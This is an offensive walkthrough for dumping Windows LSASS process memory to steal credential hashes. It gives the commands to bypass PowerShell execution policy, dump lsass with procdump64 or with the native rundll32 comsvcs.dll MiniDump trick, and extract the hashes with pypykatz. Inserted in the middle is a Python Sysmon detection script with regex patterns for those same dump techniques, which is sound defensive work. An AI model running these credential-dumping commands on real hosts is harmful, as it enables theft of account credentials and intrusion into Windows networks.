Lsass-dump
Mimikatz is not needed. You can dump credential hashes from LSASS by creating a memory dump of the LSASS process (an lsass.dmp file) and then using pypykatz to extract the hashes from that file.
Exploitation
This attack requires administrative privileges on the target. Upload procdump64.exe to the target machine.
Start PowerShell
powershell.exe -ep bypass
Get the lsass process ID
get-process lsass
In our case the lsass process ID is 596. Run procdump64.exe against that PID to generate a dump file containing the hashes.
Dumping Hashes into a file
.\procdump64.exe -accepteula -ma 596 lsass.dmp
ALTERNATE
A native DLL can be used instead of procdump64.exe, so nothing needs to be uploaded to the target machine.
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 596 C:\Users\Bob\Desktop\lsass.dmp full
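Both variants above (procdump64.exe with -ma, and rundll32.exe loading comsvcs.dll MiniDump) leave the same two traces on a monitored host: a process-creation command line naming the dump tool, and a handle opened on lsass.exe with memory-read rights. The following detection logic is an added example, not part of the original note: it scores constructed Sysmon-style records (Event ID 1 process creation and Event ID 10 ProcessAccess) for exactly those two indicators. The field names mirror Sysmon's, the sample events are hand-written, and the BENIGN_SOURCES allow-list is an assumption to be tuned per environment.

```python
"""Detect LSASS memory dumps via procdump -ma or comsvcs.dll MiniDump.

Added example, not code from the original note. Scores constructed
Sysmon-style records: Event ID 1 (process creation) command lines and
Event ID 10 (ProcessAccess) against lsass.exe. Records are samples, not real logs.
"""
import re

# PROCESS_VM_READ: any dump of LSASS memory must request this access right.
PROCESS_VM_READ = 0x0010

# Images that legitimately open lsass.exe on a typical host.
# Assumed allow-list for this example; tune it to your environment.
BENIGN_SOURCES = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Command-line patterns for the two techniques described on the page.
CMDLINE_PATTERNS = [
    ("procdump_lsass", re.compile(r"procdump(64)?(\.exe)?\s.*-ma\s+(lsass|\d+)", re.I)),
    ("comsvcs_minidump", re.compile(r"comsvcs\.dll\s*,?\s*MiniDump\b", re.I)),
]


def analyze_process_access(ev):
    """Event ID 10: non-allow-listed image opening lsass.exe with memory-read rights."""
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    source = ev.get("SourceImage", "").lower()
    if source in BENIGN_SOURCES:
        return None
    mask = int(ev.get("GrantedAccess", "0x0"), 16)
    if mask & PROCESS_VM_READ:
        return ("lsass_access", source, hex(mask))
    return None


def analyze_process_create(ev):
    """Event ID 1: command line matching one of the dump tools on this page."""
    cmd = ev.get("CommandLine", "")
    for name, pattern in CMDLINE_PATTERNS:
        if pattern.search(cmd):
            return (name, ev.get("Image", "").lower(), cmd)
    return None


def detect(events):
    """Return a list of (rule, subject, detail) findings for a stream of events."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 10:
            hit = analyze_process_access(ev)
        elif eid == 1:
            hit = analyze_process_create(ev)
        else:
            hit = None
        if hit:
            findings.append(hit)
    return findings


# Constructed sample telemetry (not real logs). PID 596 matches the note above.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",  # benign, allow-listed
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 1, "Image": r"C:\Users\Bob\Desktop\procdump64.exe",
     "CommandLine": r".\procdump64.exe -accepteula -ma 596 lsass.dmp"},
    {"EventID": 10, "SourceImage": r"C:\Users\Bob\Desktop\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 596 C:\Users\Bob\Desktop\lsass.dmp full"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},  # unrelated
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The ProcessAccess rule is the more robust of the two, since it fires on the handle open regardless of which tool or command-line spelling was used; the command-line rule adds context on which technique was seen. Both rely on Sysmon (or equivalent EDR telemetry) already logging process access to lsass.exe.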
Using Pypykatz
After downloading the lsass.dmp file to the attacking machine, extract the hashes with pypykatz.
pypykatz lsa minidump lsass.dmp